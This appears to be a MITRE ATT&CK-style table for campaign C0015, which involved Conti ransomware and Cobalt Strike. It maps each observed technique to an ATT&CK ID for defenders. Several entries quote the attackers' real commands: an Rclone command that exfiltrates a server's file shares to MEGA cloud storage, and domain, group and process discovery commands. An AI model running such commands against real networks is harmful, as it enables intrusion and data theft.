| enterprise |
T1059 |
Command and Scripting Interpreter |
- |
| enterprise |
T1059.003 |
Windows Command Shell |
During C0015, the threat actors used cmd.exe to execute commands and run malicious binaries. |
| enterprise |
T1059.005 |
Visual Basic |
During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code. |
| enterprise |
T1059.007 |
JavaScript |
During C0015, the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code. |
| enterprise |
T1486 |
Data Encrypted for Impact |
During C0015, the threat actors used Conti ransomware to encrypt a compromised network. |
| enterprise |
T1005 |
Data from Local System |
During C0015, the threat actors obtained files and data from the compromised network. |
| enterprise |
T1039 |
Data from Network Shared Drive |
During C0015, the threat actors collected files from network shared drives prior to network encryption. |
| enterprise |
T1074 |
Data Staged |
- |
| enterprise |
T1074.001 |
Local Data Staging |
During C0015, PowerView’s file share enumeration results were stored in the file c:\ProgramData\found_shares.txt. |
| enterprise |
T1030 |
Data Transfer Size Limits |
During C0015, the threat actors limited Rclone‘s bandwidth setting during exfiltration. |
| enterprise |
T1482 |
Domain Trust Discovery |
During C0015, the threat actors used the command nltest /domain_trusts /all_trusts to enumerate domain trusts. |
| enterprise |
T1567 |
Exfiltration Over Web Service |
- |
| enterprise |
T1567.002 |
Exfiltration to Cloud Storage |
During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M. |
| enterprise |
T1083 |
File and Directory Discovery |
During C0015, the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful. |
| enterprise |
T1105 |
Ingress Tool Transfer |
During C0015, the threat actors downloaded additional tools and files onto a compromised network. |
| enterprise |
T1570 |
Lateral Tool Transfer |
During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network. |
| enterprise |
T1036 |
Masquerading |
During C0015, the threat actors named a binary file compareForfor.jpg to disguise it as a JPG file. |
| enterprise |
T1135 |
Network Share Discovery |
During C0015, the threat actors executed the PowerView ShareFinder module to identify open shares. |
| enterprise |
T1027 |
Obfuscated Files or Information |
During C0015, the threat actors used Base64-encoded strings. |
| enterprise |
T1588 |
Obtain Capabilities |
- |
| enterprise |
T1588.001 |
Malware |
For C0015, the threat actors used Cobalt Strike and Conti ransomware. |
| enterprise |
T1588.002 |
Tool |
For C0015, the threat actors obtained a variety of tools, including AdFind, AnyDesk, and Process Hacker. |
| enterprise |
T1069 |
Permission Groups Discovery |
- |
| enterprise |
T1069.001 |
Local Groups |
During C0015, the threat actors used the command net localgroup "adminstrator" to identify accounts with local administrator rights. |
| enterprise |
T1069.002 |
Domain Groups |
During C0015, the threat actors use the command net group "domain admins" /dom to enumerate domain groups. |
| enterprise |
T1566 |
Phishing |
- |
| enterprise |
T1566.001 |
Spearphishing Attachment |
For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims. |
| enterprise |
T1057 |
Process Discovery |
During C0015, the threat actors used the tasklist /s command as well as taskmanager to obtain a list of running processes. |
| enterprise |
T1055 |
Process Injection |
- |
| enterprise |
T1055.001 |
Dynamic-link Library Injection |
During C0015, the threat actors used a DLL named D8B3.dll that was injected into the Winlogon process. |
| enterprise |
T1219 |
Remote Access Software |
During C0015, the threat actors installed the AnyDesk remote desktop application onto the compromised network. |
| enterprise |
T1021 |
Remote Services |
- |
| enterprise |
T1021.001 |
Remote Desktop Protocol |
During C0015, the threat actors used RDP to access specific network hosts of interest. |
| enterprise |
T1018 |
Remote System Discovery |
During C0015, the threat actors used the commands net view /all /domain and ping to discover remote systems. They also used PowerView’s PowerShell Invoke-ShareFinder script for file share enumeration. |
| enterprise |
T1553 |
Subvert Trust Controls |
- |
| enterprise |
T1553.002 |
Code Signing |
For C0015, the threat actors used DLL files that had invalid certificates. |
| enterprise |
T1218 |
System Binary Proxy Execution |
- |
| enterprise |
T1218.005 |
Mshta |
During C0015, the threat actors used mshta to execute DLLs. |
| enterprise |
T1218.010 |
Regsvr32 |
During C0015, the threat actors employed code that used regsvr32 for execution. |
| enterprise |
T1218.011 |
Rundll32 |
During C0015, the threat actors loaded DLLs via rundll32 using the svchost process. |
| enterprise |
T1016 |
System Network Configuration Discovery |
During C0015, the threat actors used code to obtain the external public-facing IPv4 address of the compromised host. |
| enterprise |
T1124 |
System Time Discovery |
During C0015, the threat actors used the command net view /all time to gather the local time of a compromised network. |
| enterprise |
T1204 |
User Execution |
- |
| enterprise |
T1204.002 |
Malicious File |
During C0015, the threat actors relied on users to enable macros within a malicious Microsoft Word document. |
| enterprise |
T1047 |
Windows Management Instrumentation |
During C0015, the threat actors used wmic and rundll32 to load Cobalt Strike onto a target host. |